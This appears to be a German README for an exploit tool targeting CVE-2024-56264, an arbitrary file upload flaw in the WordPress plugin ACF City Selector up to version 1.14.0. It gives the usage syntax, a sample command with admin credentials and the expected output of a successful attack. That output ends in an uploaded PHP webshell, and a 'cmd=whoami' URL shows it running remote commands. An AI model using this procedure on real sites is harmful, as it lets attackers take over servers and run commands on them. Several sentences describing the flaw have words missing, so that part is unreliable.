
WordPress ACF City Selector plugin <= 1.14.0 - Schwachstelle für beliebigen Datei-Upload
Dieses Repository enthält einen Exploit für CVE-2024-56264, eine Schwachstelle für beliebigen Dateiupload im WordPress-Plugin ACF City Selector (Versionen <= 1.14.0). Diese Schwachstelle ermöglicht es einem Angreifer, eine bösartige PHP-Datei (Webshell) auf eine verwundbare WordPress-Instanz hochzuladen und beliebige Befehle auf dem Server auszuführen.
<= 1.14.0Das Plugin ACF City Selector validiert hochgeladene Dateien nicht ordnungsgemäß, sodass Angreifer und hochladen können. Sobald eine bösartige PHP-Datei hochgeladen wurde, kann ein Angreifer aus der Ferne Systembefehle ausführen, was zu einer führt.
Stellen Sie sicher, dass Folgendes installiert ist, bevor Sie das Skript ausführen:
requests (Installation mit: pip install requests)Sie können alle erforderlichen Abhängigkeiten installieren mit:
pip install -r requirements.txt
Ausführen des Exploits:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector Plugin <= 1.14.0 - Schwachstelle für beliebigen Dateiupload
options:
-h, --help zeigt diese Hilfemeldung an und beendet das Programm
--url URL Basis-URL der Website (z. B. http://192.168.100.74/wordpress)
--username USERNAME WordPress-Benutzername
--password PASSWORD WordPress-Passwort
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
Bei erfolgreicher Ausnutzung sollten Sie Folgendes sehen:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
Bei Erfolg greifen Sie auf die hochgeladene Shell zu über:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Dies ermöglicht die Remote-Ausführung von Befehlen auf dem Server.
Dieses Skript ist nur für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Unbefugte Nutzung ist illegal und kann schwerwiegende Konsequenzen haben. Der Autor übernimmt keine Verantwortung für den Missbrauch dieses Exploits.